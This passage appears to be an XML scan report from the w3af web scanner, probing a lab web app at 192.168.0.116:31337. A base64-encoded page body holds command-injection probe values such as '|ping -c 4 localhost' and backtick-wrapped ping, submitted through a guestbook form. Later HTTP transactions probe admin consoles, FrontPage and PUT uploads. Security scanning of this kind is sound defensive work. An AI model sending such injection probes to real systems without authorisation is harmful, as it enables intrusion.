PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHBpbmcgLW4gNCBsb2Nh
bGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+fHBpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fC91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaG9zdCA0
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PjtwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPjtwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjsvdXNyL3NiaW4vcGlu
ZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhv
c3RgPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgo=
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[16, 110, 112, 116, 137, 143, 174, 196, 201, 202, 203, 204, 206, 207, 210, 211, 212, 213, 214, 215, 216, 217, 218, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 233, 235, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 256, 257, 258, 259, 260, 261, 262, 267, 268, 269, 270, 271, 272, 273, 275, 291, 304, 305, 306, 307, 308, 309, 310, 314, 315, 316, 317, 318, 320, 321, 322, 323, 325, 327, 329, 330, 331, 332, 333, 334, 337, 338, 339, 340, 341, 344, 345, 347, 353, 355, 356, 358, 359, 360, 361, 362, 363, 364, 366, 367, 369, 371, 384, 385, 394, 411, 418, 422, 425, 433, 434, 435, 447, 468, 484, 492, 529, 531, 535, 538, 541, 543, 547, 548, 549, 550, 551, 555, 563, 570, 624, 667, 721, 761, 764, 790, 814, 815, 820, 828, 844, 845, 847, 852, 855, 863, 868, 882, 900, 913, 929, 936, 945, 952, 961, 968, 977, 984, 993, 1000, 1009, 1015]" name="Click-Jacking vulnerability" plugin="click_jacking" url="None">
        <description>The whole target has no protection (X-Frame-Options header) against Click-Jacking attacks. This vulnerability was found in the requests with ids 16, 110, 112, 116, 137, 143, 174, 196, 201 to 204, 206 to 207, 210 to 218, 220 to 231, 233, 235, 237 to 254, 256 to 262, 267 to 273, 275, 291, 304 to 310, 314 to 318, 320 to 323, 325, 327, 329 to 334, 337 to 341, 344 to 345, 347, 353, 355 to 356, 358 to 364, 366 to 367, 369, 371, 384 to 385, 394, 411, 418, 422, 425, 433 to 435, 447, 468, 484, 492, 529, 531, 535, 538, 541, 543, 547 to 551, 555, 563, 570, 624, 667, 721, 761, 764, 790, 814 to 815, 820, 828, 844 to 845, 847, 852, 855, 863, 868, 882, 900, 913, 929, 936, 945, 952, 961, 968, 977, 984, 993, 1000, 1009 and 1015.</description>
        <http-transactions>
            <http-transaction id="16">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="16">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="110">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="110">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="112">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="112">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="116">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/USnBl.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="116">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/USnBl.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="137">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="137">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="143">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L1VTbkJsLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGgubEJuU1U=
</body>
                </httprequest>
                <httpresponse id="143">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="174">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="174">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="196">
                <httprequest>
                    <status>PUT http://192.168.0.116:31337/huaJs HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">T0IwuI</body>
                </httprequest>
                <httpresponse id="196">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="201">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="201">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="202">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="202">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="203">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="203">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="204">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="204">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="206">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="206">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="207">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="207">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="210">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.cab HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="210">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="211">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.cab HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="211">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
